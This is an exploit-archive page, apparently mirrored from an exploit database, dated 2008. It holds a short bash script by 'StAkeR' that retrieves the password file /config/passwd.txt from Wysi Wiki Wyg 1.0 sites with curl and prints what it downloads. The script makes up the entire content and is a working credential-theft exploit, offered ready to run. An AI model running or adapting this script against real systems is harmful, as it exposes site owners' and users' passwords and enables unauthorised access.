[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Wysi Wiki Wyg 1.0 Remote Password Retrieve Exploit
# Published : 2008-12-12
# Author : StAkeR
# Previous Title : Social Groupie (group_index.php id) Remote SQL Injection Vulnerability
# Next Title : Social Groupie (create_album.php) Remote File Upload Vulnerability


#!/bin/bash
# Wysi Wiki Wyg 1.0 Remote Password Retrieve Exploit
# by athos - staker[at]hotmail[dot]it

host=$1;
name=$2;
path='/config/passwd.txt';

if [ "$name" = "" ]; then
        echo "Usage: bash $0 [host/path] [filename]";
        echo "by athos - staker[at]hotmail[dot]it";
        exit;
fi;      

curl $host/$path > $name;
clear
cat $name;

# www.Syue.com [2008-12-12]